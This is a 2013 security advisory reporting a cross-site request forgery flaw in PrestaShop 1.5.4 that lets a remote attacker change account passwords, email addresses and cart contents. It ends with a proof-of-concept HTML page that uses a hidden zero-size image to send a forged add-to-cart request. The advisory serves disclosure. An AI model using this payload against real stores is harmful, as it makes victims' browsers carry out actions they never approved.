PrestaShop version 1.5.4 suffers from a cross site request forgery vulnerability.
569006bfc5d70826e09cb71f57f8aef0f71ab333fe47164b4cb288a5f9fa457e
View online: http://demo-store.prestashop.com/en/
* Advisory ID: PRESTASHOP
* Version: 1.5.4
* Date: 2013-July-11
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery
-------- DESCRIPTION
---------------------------------------------------------
With this vulnerability, account passwords and mail adresses could be modified and also products could be added or removed remotely from the shopping cart.
-------- SOLUTION
------------------------------------------------------------
There is no solution for this vulnerability at the moment.
-------- REPORTED BY
---------------------------------------------------------
* EntPro Cyber Security Research Group (www.entpro.com.tr)
(Eyüp ÇELÝK, Ýsmail SAYGILI, Gökay BEKÞEN, Ünlü AÐYOL, Yunus Emre KARABULUT)
-------- EXPLOIT CODE
---------------------------------------------------------
<html>
<head>
<body>
<img src="http://localhost/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>